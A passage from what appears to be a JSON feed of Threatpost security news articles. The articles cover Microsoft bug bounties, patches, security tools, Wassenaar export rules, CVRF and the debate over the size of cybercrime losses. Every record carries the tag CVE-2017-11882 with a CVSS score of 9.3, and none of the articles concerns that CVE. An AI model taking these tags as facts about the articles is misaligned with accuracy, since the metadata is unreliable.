11](<http://threatpost.com/researchers-nab-28k-in-microsoft-bug-bounty-program/102535>) in the summer of 2013), until today when Microsoft launched the [Microsoft Online Services Bug Bounty Program](<http://technet.microsoft.com/en-us/security/dn800983>). Bounties start at $500, and vulnerabilities in cloud-based services such as Office 365 are the first eligible in the program, Microsoft said.\n\n\u201cGenerally, bounties will be paid for significant web application vulnerabilities found in eligible online service domains,\u201d Microsoft said in a statement announcing the program, adding that researchers must also submit concise steps that will allow Microsoft engineers to reproduce the vulnerability.\n\nOnly certain domains are eligible, Microsoft said. That list includes:\n\n * portal.office.com\n * *.outlook.com (Office 365 for business email services applications, excluding any consumer \u201coutlook.com\u201d services)\n * outlook.office365.com\n * login.microsoftonline.com\n * *.sharepoint.com\n * *.lync.com\n * *.officeapps.live.com\n * www.yammer.com\n * api.yammer.com\n * adminwebservice.microsoftonline.com\n * provisioningapi.microsoftonline.com\n * graph.windows.net\n\nOnly certain vulnerability classes are eligible as well, including cross-site scripting, cross-site request forgery, insecure direct object references, injection and authentication flaws, server-side code execution, privilege escalation, security configuration issues and cross-tenant data tampering or access eligible in multitenant services, Microsoft said.\n\n\u201cThe aim of the bug bounty is to uncover significant vulnerabilities that have a direct and demonstrable impact to the security of our users and our users\u2019 data,\u201d Microsoft said.\n\nMicrosoft also listed a number of vulnerabilities that are ineligible; those include:\n\n * Missing HTTP Security Headers (such as X-FRAME-OPTIONS) or cookie security flags (such as \u201chttponly\u201d)\n * Server-side information 
disclosure such as IPs, server names and most stack traces\n * Bugs in the web application that only affect unsupported browsers and plugins\n * Bugs used to enumerate or confirm the existence of users or tenants\n * Bugs requiring unlikely user actions\n * URL Redirects (unless combined with another flaw to produce a more severe vulnerability)\n * Vulnerabilities in platform technologies that are not unique to the online services in question (Apache or IIS vulnerabilities, for example.)\n * \u201cCross Site Scripting\u201d bugs in SharePoint that require \u201cDesigner\u201d or higher privileges in the target\u2019s tenant.\n * Low impact CSRF bugs (such as logoff)\n * Denial of Service issues\n * Cookie replay vulnerabilities\n\nMicrosoft also made it clear that it wants researchers to shy away from denial-of-service testing or any type of automated testing of its services that could lead to significant traffic sent their way. Researchers are also discouraged from trying to access data belonging to someone else consuming a cloud service or expanding a test to include social engineering or phishing against Microsoft employees.\n\nMicrosoft said complete submissions can be sent to [secure@microsoft.com](<mailto:secure@microsoft.com>).\n", "cvss3": {}, "published": "2014-09-23T15:52:05", "type": "threatpost", "title": "Microsoft Online Services Bug Bounty Program Launches", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-23T19:52:05", "id": "THREATPOST:222B126A673B8B22370D386B699A7F90", "href": "https://threatpost.com/microsoft-starts-online-services-bug-bounty/108486/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:54", "description": "Microsoft has released a new version of the MS13-036 patch that was causing some customers\u2019 machines to crash. 
The company had recommended in the days after the original fix was first released that customers [uninstall the MS13-036 patch](<http://threatpost.com/microsoft-uninstall-faulty-patch-tuesday-security-update-041213/>) while Microsoft investigated the cause of the problems.\n\nThe new fix that Microsoft released on Tuesday resolves some conflicts with third-party applications that apparently were causing the blue screen issues for some people. The company didn\u2019t specify which software was causing the crashes, but said that the update should resolve the problems.\n\n\u201cWe\u2019ve determined that the update, when paired with certain third-party software, can cause system errors,\u201d said Trustworthy Computing group manager Dustin Childs at the time that the patch was recalled earlier this month.\n\nThe MS13-036 patch fixes a pair of race condition vulnerabilities in the Windows kernel, both of which could be used for code execution. However, the patch was rated important rather than critical because an attacker would need physical access to a vulnerable machine in order to run code using one of these bugs.\n\nChilds said in a blog post Tuesday that customers should install the revised update as soon as possible.\n\n\u201cAs we [previously discussed](<http://blogs.technet.com/b/msrc/archive/2013/04/11/kb2839011-released-to-address-security-bulletin-update-issue.aspx> \"previously discussed\" ), we stopped distributing this update when we learned some customers were having issues. The new update, [KB2840149](<http://support.microsoft.com/kb/2840149> \"KB2840149\" ), still addresses the Moderate security issue described in MS13-036, and should not cause these issues. If you have automatic updates enabled, you won\u2019t need to take any actions. 
For those manually updating, we encourage you to apply this update at your earliest convenience,\u201d he said.\n", "cvss3": {}, "published": "2013-04-24T10:00:23", "type": "threatpost", "title": "Microsoft Releases Updated MS13-036 Patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-24T14:02:36", "id": "THREATPOST:2C798ED7D1CE36B13D82410EA1C94D9F", "href": "https://threatpost.com/microsoft-releases-updated-ms13-036-patch/99885/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:17", "description": "[](<https://threatpost.com/microsoft-give-security-guidelines-agile-110909/>)Microsoft will release on Tuesday guidelines for developers building online applications and for those using the Agile code-development process. The Agile guidelines apply principles from Microsoft\u2019s Security Development Lifecycle (SDL) to Agile, an umbrella term for a development model frequently used for Web-based applications released under short deadlines, called \u201csprints.\u201d [Read the full article](<http://www.computerworld.com/s/article/9140543/Microsoft_to_release_security_guidelines_for_Agile>). 
[Computerworld]\n", "cvss3": {}, "published": "2009-11-09T18:26:11", "type": "threatpost", "title": "Microsoft to Give Security Guidelines for Agile", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:14:29", "id": "THREATPOST:F68D705DC9A7663E4BF22574470F51D7", "href": "https://threatpost.com/microsoft-give-security-guidelines-agile-110909/73057/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:31", "description": "The commenting period regarding the [Wassenaar Arrangement](<https://threatpost.com/head-scratching-begins-on-proposed-wassenaar-export-control-rules/112959>) expired on Monday but the echo chamber around the largely maligned proposal continues to reverberate. Several stakeholders implicated in the proposal added their voices to that chamber on Friday morning, urging the government to revise particulars of the proposal that they believe will ultimately constrain security research and severely hamper day-to-day operations at multiple security firms.\n\nLegal representatives from Microsoft, FireEye, Symantec, and security experts from other companies discussed the arrangement Friday morning during a panel, \u201cDecoding the BIS Proposed Rule for Intrusion Software Platforms,\u201d at the Center for Strategic & International Studies in Washington.\n\nCristin Goodwin, a senior attorney for Microsoft, warned that in its current incarnation the Commerce Department\u2019s implementation of Wassenaar would bring research at the company, most of which follows the sun\u2013going country to country in real time\u2013to a screeching halt.\n\nGoodwin claimed the rules don\u2019t make sense for companies who do this kind of work regularly, pointing out that they\u2019d especially impede the reverse engineering of malware, something researchers at Microsoft do daily, Goodwin claimed.\n\n\u201cTo be able to understand [malware] \u2014 what 
it is, what it does, you\u2019d have to go get a license. How do you define or describe this category? If you\u2019re looking to articulate what this is, you\u2019re bringing into scope the everyday activities of security companies here,\u201d Goodwin said.\n\nUnder the Wassenaar proposal, brought forth by the U.S. Department of Commerce\u2019s Bureau of Industry and Security (BIS) back in May, the export of what BIS refers to as intrusion software would be tightened. For many companies, to carry out certain research activities, they\u2019d be forced to request export licenses, something that many security officials believe would work against the idea of information sharing.\n\nThe issue has been a largely one-sided one. Vagaries in the rule\u2019s wording have many believing that under Wassenaar, export control authorities, not vulnerability researchers, will dictate the tempo of legitimate research and exploit development. As it stands, the rules, already adopted by the EU, aim to curb intrusion software like FinFisher and Hacking Team\u2019s Remote Control System.\n\nOfficials at Google [called out the arrangement on Monday](<https://threatpost.com/google-calls-proposed-u-s-wassenaar-rules-not-feasible/113865>), insisting the rules aren\u2019t feasible and would have a \u201csignificant negative impact\u201d on security research, possibly requiring the company to request thousands or tens of thousands of export licenses for its research.\n\nLaura Galante, the director of threat intelligence at FireEye, echoed those sentiments Friday morning, saying that like Google, her company\u2019s research team would have to file for tens of thousands of licenses and that they\u2019d likely also be working against the presumption of denial, something that could eventually breed a defeatist \u201cdon\u2019t bother\u201d mentality.\n\nKatie Moussouris, chief policy officer at HackerOne, was one of the first to [publish her 
feelings](<https://threatpost.com/security-researchers-sound-off-on-proposed-us-wassenaar-rules/113023>) on the proposed rules. On Friday, she described to the panel how companies that specialize in cybersecurity defense would be more harmed by Wassenaar than those who cater to offense. Moussouris described how Microsoft, her former employer \u2013 and [bug bounty companies](<https://threatpost.com/bug-bounties-in-crosshairs-of-proposed-us-wassenaar-rules/113204>) like HackerOne \u2013 have benefited from bounty programs that wouldn\u2019t have been able to flourish under the proposed agreement. Specifically Moussouris referenced the success of Microsoft\u2019s Mitigation Bypass Bounty program.\n\n\u201cThe reason why that bounty program exists is because the only other way that a company like Microsoft can learn about new exploitation techniques was through actual attacks. Providing a defensive incentive to bring those forward earlier gives Microsoft a head start in defense,\u201d Moussouris said. \u201cThat program was launched a few months before Wassenaar added those rules.\u201d\n\n\u201cMicrosoft has awarded that bounty five times in the past two years. That\u2019s five times that Microsoft has gained access to technology that\u2019s regulated in this proposal and five times that Microsoft would have not had access to that information to build a more secure operating system,\u201d Moussouris said. 
\u201cThis is a concrete example of how this regulation impacts defense.\u201d\n\n> .[@msftsecurity](<https://twitter.com/msftsecurity>)'s bug bounty program implemented in the last 2 yrs wouldn't have happened under the proposed rule \u2013 [@k8em0](<https://twitter.com/k8em0>) [#CSISLive](<https://twitter.com/hashtag/CSISLive?src=hash>)\n> \n> \u2014 CSIS Cyber Feed (@CyberCSIS) [July 24, 2015](<https://twitter.com/CyberCSIS/status/624575567761940480>)\n\nIn the end, rules may actually prove fruitless, Stewart Baker, a partner at Steptoe & Johnson LLP, said during the panel. Baker remarked that many of the more serious and restrictive Wassenaar rules date back to the Cold War, and admitted that relying on criminal prosecution might be a better move.\n\n> Relying on criminal prosecution may be a more effective method in achieving what we want than regulation \u2013 [@stewartbaker](<https://twitter.com/stewartbaker>) [#CSISLive](<https://twitter.com/hashtag/CSISLive?src=hash>)\n> \n> \u2014 CSIS Cyber Feed (@CyberCSIS) [July 24, 2015](<https://twitter.com/CyberCSIS/status/624587322311471105>)\n\n\u201cNo export control regime is going to have any impact on the bad guys, they already have the tools,\u201d Baker said.\n\n\u201cWhat we\u2019re looking at here is the U.S. 
taking unilateral control of its tech industry,\u201d Baker said.\n", "cvss3": {}, "published": "2015-07-24T13:29:14", "type": "threatpost", "title": "Stakeholders Argue Against Restrictive Wassennaar Proposal", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-07-30T14:08:12", "id": "THREATPOST:A844D1411E7339911EECDDBD5596A9E7", "href": "https://threatpost.com/stakeholders-argue-against-restrictive-wassennaar-proposal/113941/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:03", "description": "[](<https://threatpost.com/microsoft-accused-downplaying-iis-flaw-052009/>)\n\nA security researcher from nCircle is accusing Microsoft of gamesmanship in its description of an unpatched IIS vulnerability in the way the WebDAV extension decodes a requested URL. The end result is that a successful exploit would allow a hacker to bypass authentication and gain unauthorized access to resources.\n\n\u201cMicrosoft has classified this issue two different ways in two different places,\u201d he said. \u201c[On the SRD blog ](<http://blogs.technet.com/srd/archive/2009/05/18/more-information-about-the-iis-authentication-bypass.aspx>)(it) refers to this as a Information Disclosure vulnerability, while [the Microsoft Advisory ](<http://www.microsoft.com/technet/security/advisory/971492.mspx>)refers to this as an elevation of privilege,\u201d says nCircle\u2019s Tyler Reguly.\n\nThe point, he said, is that the bug should be called what it is\u2013an access control breach or an authentication bypass. 
SRD acknowledges the Authentication Bypass but downplays it because you are accessing a single page with the anonymous user privileges, he added.\n\n[Read the full story](<http://securitywatch.eweek.com/browsers/security_researcher_microsoft_downplaying_iis_vulnerability.html?kc=rss>) [eweek.com]\n\nHere\u2019s [our previous coverage](<https://threatpost.com/microsoft-accused-downplaying-iis-flaw-052009/>) of this issue.\n", "cvss3": {}, "published": "2009-05-21T00:03:55", "type": "threatpost", "title": "Microsoft accused of downplaying IIS flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:07", "id": "THREATPOST:765141925BCF61E1BEC4EA2E7E28C380", "href": "https://threatpost.com/microsoft-accused-downplaying-iis-flaw-052009/72754/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:05:46", "description": "In parallel with its release of 17 bulletins on Patch Tuesday this month, Microsoft also unveiled two new tools that are meant to help make a couple of common exploitation scenarios more difficult for attackers.\n\nThe company released a tool called Office File Validation for some older versions of Office, including Office 2003 and 2007. The feature is specifically designed to give users information about whether there\u2019s a potentially malicious component in an Office file that the user is trying to open. When the user attempts to open a file, the Office File Validation tool will inspect it and look for any signs of malicious behavior. If there\u2019s a problem, the user will get a warning dialog box giving him the opportunity to cancel the operation.\n\nAttackers in the past few months have taken to embedding malicious Flash files inside Word and Excel documents as part of spear phishing campaigns. 
This was the primary attack vector used to compromise RSA last month.\n\n\u201cOffice File Validation helps detect and prevent a kind of exploit \nknown as a file format attack. File format attacks exploit the integrity \nof a file, and occur when the structure of a file is modified with the \nintent of adding malicious code. Usually the malicious code is run \nremotely and is used to elevate the privilege of restricted accounts on \nthe computer. As a result, an attacker could gain access to a computer \nthat was not previously accessible,\u201d Microsoft said in its [advisory on the validation tool](<https://www.microsoft.com/technet/security/advisory/2501584.mspx>). \n\n\u201cThis could enable an attacker to \nread sensitive information from the computer\u2019s hard disk drive or to \ninstall malware, such as a worm or a key logging program. The Office \nFile Validation feature helps prevent file format attacks by scanning \nand validating files before they are opened. To validate files, Office \nFile Validation compares a file\u2019s structure to a predefined file schema, \nwhich is a set of rules that define what a readable file looks like. If \nOffice File Validation detects that a file\u2019s structure does not follow \nall rules described in the schema, the file does not pass validation.\u201d\n\nThe second enhancement Microsoft pushed out on Tuesday is an [update to winload.exe](<https://www.microsoft.com/technet/security/advisory/2506014.mspx>), the component that loads Windows. The update is designed to help prevent some techniques that rootkits use to evade detection and remain persistent on infected machines.\n\n\u201cFor a rootkit to be successful it must stay hidden and persistent on \na system. One way we have seen rootkits hide themselves on 64-bit \nsystems is bypassing driver signing checks done by winload.exe. 
While \nthe update itself won\u2019t remove a rootkit, it will expose an installed \nrootkit and give your anti-malware software the ability to detect and \nremove the rootkit,\u201d Microsoft\u2019s Dustin Childs said. \n", "cvss3": {}, "published": "2011-04-12T19:00:28", "type": "threatpost", "title": "Microsoft Pushes Out Two New Security Tools", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:34:45", "id": "THREATPOST:769E9696F176FD575D7F365CA771EFC3", "href": "https://threatpost.com/microsoft-pushes-out-two-new-security-tools-041211/75129/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:03", "description": "Since the beginning of recorded time, security researchers, software vendors and hackers have been issuing security advisories in all kinds of nutty formats. Some feature excellent ASCII art, some have clever inside jokes and some come from Microsoft. Now, there\u2019s an effort underway, called the Common Vulnerability Reporting Framework, to standardize the way that vulnerabilities are reported so that they\u2019re in a common, machine-readable format. \n\nThe [CVRF](<http://www.icasi.org/cvrf>) is the product of a group called the Industry Consortium for Advancement of Security on the Internet, and Microsoft in May for the first time produced its monthly Patch Tuesday advisories in the CVRF format. The company said that while the CVRF itself is still in its initial stages and will continue to evolve, the current version should give enterprise customers a good option for automating bulletin deployment. \n\n\u201cFor many customers, a machine-readable markup framework for security releases might not be a pressing need. For instance, home-computer users or small businesses may choose to install security updates automatically. 
However, many business customers spend time \u201ccopying and pasting\u201d our security bulletin content into their risk management systems, spreadsheets and corporate notification emails manually as part of their IT security compliance and remediation task list,\u201d [Microsoft\u2019s Mike Reavey](<http://blogs.technet.com/b/msrc/archive/2012/05/17/microsoft-security-updates-and-the-common-vulnerability-reporting-framework.aspx>) said in a blog post on CVRF.\n\n\u201cFor these customers, this machine-readable format may enable more efficiency and automation. Faster and more efficient guidance for these customers means they can more quickly ensure protection, which is always our goal. For those that do not require automation, we will continue to offer our bulletins in the current format.\u201d\n\nICASI members include IBM, Cisco, Juniper, Nokia and Amazon, among other companies. The current version of CVRF is 1.1, the second iteration, and the framework will continue to change as users provide feedback and requirements evolve.\n\n\u201cCVRF was created to fill a major gap in vulnerability standardization: the lack of a standard framework for the creation of vulnerability report documentation. 
Although the computer security community had made significant progress in several other areas, including categorizing and ranking the severity of vulnerabilities in information systems with the widespread adoption of the Common Vulnerabilities and Exposures (CVE) dictionary and the Common Vulnerability Scoring System (CVSS), this lack of standardization was evident in every vulnerability report, best practice document, or security bulletin released by any vendor or coordinator,\u201d the CVRF documentation says.\n", "cvss3": {}, "published": "2012-05-18T17:52:11", "type": "threatpost", "title": "Microsoft Adopts CVRF Format for Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:13", "id": "THREATPOST:A21BD1B60411A9861212745052E23AE7", "href": "https://threatpost.com/microsoft-adopts-cvrf-format-security-bulletins-051812/76582/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:33", "description": "Computer users are taking steps to mitigate online security threats, but still only score a paltry 34 out of 100 \u2013 a solid \u201cF\u201d \u2013 according to a new study by Microsoft. \n\nThe study, sponsored by [Microsoft\u2019s Trustworthy Computing Group](<http://www.microsoft.com/about/twc/en/us/default.aspx>) (TwC), introduces a new metric, the [Microsoft Computing Safety Index](<http://www.microsoft.com/security/resources/mcsi.aspx>) (MCSI) to measure online safety, but finds that consumers are having trouble getting past the basics when it comes to staying safe on the Internet.\n\nThe MCSI assigns a point value to a series of steps (more than 20 in all) that consumers can take to protect themselves online. 
Each point in turn is assigned to a tier of activity: Foundational (30 points), Technical (40 points) and Behavioral (30 points).\n\nActions like keeping strong passwords and choosing reputable Web sites fall under the Behavioral tier. Using a firewall, maintaining anti-virus software and running regular updates falls under the Foundational tier. The more steps you take, the higher your MCSI score, with 100 being the highest score possible.\n\nMicrosoft polled consumers in U.S., U.K., Germany, France and Brazil in what the company called a \u2018benchmark survey.\u2019 The average MCSI from that poll, 34, suggests users have the basics covered but have left lots of room to improve, Microsoft said.\n\nAmong the five countries, 55 percent of users use automatic computer updates and roughly 90 percent of those surveyed use anti-virus protection. Conversely, only 26 percent of users said they had confidence in their PC security software while only eleven percent agreed \u201cgood digital citizens\u201d are winning the war against hackers.\n\nThe metric was developed in conjunction with the upcoming 10-year anniversary of the [Trustworthy Computing Group](<https://threatpost.com/katie-moussouris-microsoft-trustworthy-computing-and-evolution-security-community-031611/>) next year and was released as October, [National Cyber Security Awareness Month](<https://threatpost.com/president-obama-national-cybersecurity-awareness-month-101909/>), winds down.\n", "cvss3": {}, "published": "2011-10-27T21:22:26", "type": "threatpost", "title": "Microsoft Invents New Way To Measure Online Safety (And Finds That Consumers Stink At It)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:29", "id": "THREATPOST:11053DD231ACA5F34708B38E7E96AE9F", "href": "https://threatpost.com/microsoft-invents-new-way-measure-online-safety-and-finds-consumers-stink-it-102711/75813/", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:28", "description": "Microsoft earlier this week published [a 25-page framework](<http://blogs.microsoft.com/cybertrust/2015/01/27/putting-information-sharing-into-context/>) offering guidance on how to effectively share information and what kinds of information need to be shared in order to reduce overall risk.\n\n[Information sharing](<http://threatpost.com/information-sharing-on-threats-seen-as-a-key-for-auto-makers/108185>) has been an oft-repeated refrain in security and policy-making circles for the better part of the last decade. There have been [draft bills](<http://threatpost.com/senate-draft-bill-to-protect-threat-information-sharing/105769>), [sharing platforms](<http://threatpost.com/microsoft-to-preview-interflow-information-sharing-platform/106798>) and every kind of [appeal](<http://threatpost.com/nsas-alexander-appeals-for-threat-information-sharing/102404>), [encouragement](<http://threatpost.com/regulator-warns-banks-about-ddos-attacks-encourages-information-sharing-122712/77349>) and assurance; yet there has also been quiet mutterings that organizations simply do not want to share information for a variety of reasons, not limited to competition concerns and personal embarrassment. In theory, sharing information and building a sort of defensive cooperative seems simple enough. However, the reality is that we are still talking about threat information sharing like it isn\u2019t happening despite the fact that it\u2019s a perpetual topic of discussion at nearly every corporate and government security conference.\n\nMicrosoft\u2019s framework seeks to define all the parties that need to be involved in any comprehensive information sharing exchange as well as the types of information that those groups need to be sharing. 
In addition to knowing with whom to share what information, Microsoft\u2019s document offers insight into designing methods, mechanisms and models for data sharing exchanges.\n\nBroadly speaking, Microsoft advises that organizations develop an overarching strategy for information sharing and collaboration with built-in privacy protections and well-established governance processes. Sharing, they say, should focus on actionable threat, vulnerability and mitigation information. Organizations need to build relationships in order to enable voluntary, trust-based information sharing, whereas mandatory sharing should remain limited. Once information is being shared, companies must ensure they are using that information to its full potential. Beyond these, Microsoft says there needs to be a voluntary, global exchange of emerging best practices.\n\nPerhaps not quite as broadly as best practices, Microsoft is encouraging that information-sharing exchanges of varying degrees of openness discuss successful attacks, including the information lost, techniques used, intent, and impact. They should also trade information about potential future threats and exploitable vulnerabilities and ways of mitigating bugs ahead of patch releases. Executive-level situational awareness, which could allow organizations to respond more quickly to attacks, as well as strategic analysis of threats faced and information sought by attackers, should be shared too.\n\nLaws can compel incident reporting, but they do not increase trust or collaboration nor do they reduce risks\n\nMicrosoft says there are basically six categories of people to include in exchanges: governments, private critical infrastructure firms, enterprises, information technology, security companies and security researchers.\n\nMicrosoft encourages efforts by policymakers to construct legislation that would encourage information sharing. 
However, trust between those incorporated into information sharing exchanges, the computer company says, is critically important.\n\n\u201cLaws can compel incident reporting,\u201d Microsoft notes, \u201cbut they do not increase trust or collaboration nor do they reduce risks.\u201d\n\nExchange models can be voluntary or mandatory, though Microsoft explains that the former is the richer model. Microsoft favors voluntary sharing models because they serve to increase the level of trust between partners. On the other hand, mandatory models could shift the focus from smart collaborative defense to companies merely reporting threat-related information for the sake of reporting it because they are required to do so.\n\n> Microsoft publishes guidance on establishing and operating threat information sharing exchanges\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fmicrosoft-publishes-information-sharing-guidelines%2F110740%2F&text=Microsoft+publishes+guidance+on+establishing+and+operating+threat+information+sharing+exchanges>)\n\nIn terms of exchange methodology, organizations and groups thereof need to consider the level of formality of their network. Formal exchanges are generally based on contractual or non-disclosure agreements while less formal, ad hoc exchanges are generally event-specific. Subsets of formalized exchanges will be necessarily based on security clearance levels while less formalized groups of like-minded organizations can share information with one another based entirely on trust within the group.\n\n\u201cHigh-quality strategic information can help to project where the next classes of cyber-threats may come from and to identify the incentives that could motivate future attackers, along with the technologies they may target,\u201d Microsoft says. 
\u201cAdditionally, strategic analysis can help put incidents into a broader context and can drive internal changes, enhancing the ability of any public or private organization to update risk management practices that reduce its exposure to risk.\u201d\n\nInformation sharing, Microsoft\u2019s Cristin Goodwin and J. Paul Nicholas explain, is not merely a human-to-human exercise but must also be automated between machines to some degree.\n\n\u201cAmong security professionals, there is currently a lot of focus on developing systems that automate the exchange of information,\u201d Microsoft wrote. \u201cIt is believed that such systems enable actors not only to identify information important to them more quickly, but also to automate mitigations to threats as they occur.\u201d\n", "cvss3": {}, "published": "2015-01-29T13:58:34", "type": "threatpost", "title": "Microsoft Publishes Information Sharing Framework", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-03T14:05:30", "id": "THREATPOST:6CF438E98DFFF4B4057CAFB1382A4D3C", "href": "https://threatpost.com/microsoft-publishes-information-sharing-guidelines/110740/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:46", "description": "Microsoft announced today that it plans on shipping seven bulletins, five critical, two important, for the [December edition](<http://technet.microsoft.com/en-us/security/bulletin/ms12-dec>) of its monthly patch Tuesday security bulletin release cycle.\n\nThe year\u2019s last scheduled batch of patches will address 11 vulnerabilities in all currently supported operating systems, including Microsoft Windows, Internet Explorer (IE 6-10), Office and the company\u2019s Server Software.\n\nIf left unpatched, six of the seven bulletins could lead to remote code execution while the last could allow a hacker to bypass one of Windows\u2019 security features.\n\nQualys\u2019 
Wolfgang Kandek notes on the company\u2019s [Laws of Vulnerabilities blog](<http://laws.qualys.com/2012/12/december-2012-patch-tuesday-pr.html>) that the third bulletin, rated critical, affects Microsoft Word, suggesting the vulnerability may leverage Outlook to display documents without the user\u2019s interaction.\n\nThe bulletin summaries will be released in their entirety next Tuesday, December 11, and, per usual, the company is set to host a [TechNet webcast](<https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032522564&Culture=en-US>) discussing the vulnerabilities and patch management practices the following day, December 12 at 11 a.m.\n", "cvss3": {}, "published": "2012-12-06T19:07:50", "type": "threatpost", "title": "Microsoft Fixing 11 Vulnerabilities for December Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:07", "id": "THREATPOST:D9C08A737D3D95BFF6B07A04C9479C6D", "href": "https://threatpost.com/microsoft-fixing-11-vulnerabilities-december-patch-tuesday-120612/77289/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:19", "description": "Estimates of the extent of cyber crime are hopelessly overblown, two computer security researchers argue in an [editorial from Sunday\u2019s New York Times](<http://www.nytimes.com/2012/04/15/opinion/sunday/the-cybercrime-wave-that-wasnt.html>).\n\nArguing counter to the prevailing opinion that online crime is a modern-day Yukon Gold Rush for entrepreneurial hackers, the two Microsoft researchers say that evidence suggests that only a sliver of the world\u2019s cyber crooks get rich from their illegal activity, while most struggle to make it. 
\n\n\u201cIf getting rich were as simple as downloading and running software, wouldn\u2019t more people do it?\u201d researchers Dinei Flor\u00eancio and Cormac Herley ask in their Times editorial, \u201cThe Cybercrime Wave That Wasn\u2019t.\u201d\n\nThe editorial synthesizes the findings of a raft of research from Herley and his colleagues that cast doubt on the estimates of the size of the cyber underground \u2013 many of which were funded by private security firms with an interest in making cyber crime appear to be a large and pressing problem.\n\nThe two studied surveys of cyber crime affecting consumers and companies. They conclude that estimates of the cost of cyber crime make a number of common errors in trying to extrapolate the extent of global cyber criminal activity. Surveys, for example, mistakenly ratchet up the numbers when they try to scale small survey groups to the overall population. The two also single out the adverse effect \u2018unverified outliers\u2019 can have on data. In their research, 90 percent of estimates are skewed by input from one or two individuals. \u201cUpward bias\u201d \u2013 a tendency of overstating a general phenomenon based on statistical evidence \u2013 permeated all of the surveys the two looked over, according to the piece.\n\nThe editorial draws from a paper by Herley and Flor\u00eancio, \u201cSex, Lies and Cyber-crime Surveys,\u201d in which the two researchers [reasoned that cyber crime surveys](<https://threatpost.com/microsoft-research-cybercrime-surveys-are-useless-062111/>) are \u201cso compromised and biased that no faith whatever can be placed in their findings.\u201d When the research was published, the duo called their assessment harsh but insisted that when it comes to security research, unreliable data is just masquerading as reliable data.\n\nThe thoughts also echo some that Herley, a principal researcher at Microsoft, has expressed before. 
In 2009, Herley challenged the concept that the underground cyber crime community\u2019s size and vitality are forces to be reckoned with.\n\nIn a June 2009 [podcast with Threatpost editor Dennis Fisher](<https://threatpost.com/cormac-herley-underground-economy-irc-economics-and-externalities-cybercrime-061209/>) still applicable today, Herley rationalized that it\u2019s hard to get an accurate reading on some security metrics and that the value of the underground economy was being oversold.\n\nIn a recent publication for IEEE Security And Privacy Magazine, Herley [took a similar, contrarian stance against popular coverage of banking fraud](<https://threatpost.com/money-mules-not-customers-real-victims-bank-fraud-032712/>), noting that money mules, not the account holders were the most victimized by online bank heists. \n", "cvss3": {}, "published": "2012-04-17T18:33:53", "type": "threatpost", "title": "Errors, Outliers Obscure Cybercrime Losses", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:26", "id": "THREATPOST:17AC167B3F04D3043199819655CB5EB8", "href": "https://threatpost.com/errors-outliers-obscure-cybercrime-losses-041712/76449/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:47", "description": "[](<https://threatpost.com/researcher-shows-killbit-no-defense-msvidctl-flaw-072709/>)Ryan Smith, one of the researchers who found the bug in the Microsoft MsVidCtl DLL that the vendor is rushing to patch this week, has posted a [short video demonstration](<http://www.hustlelabs.com/bh2009preview/>) of a technique that bypasses the stop-gap solution of preventing the vulnerable ActiveX control from loading.\n\nIn the demo, Smith, a former researcher with IBM ISS who will be giving a talk on the exploit at the Black Hat conference later this week with Mark Dowd and David Dewey, shows that setting the killbit on the vulnerable 
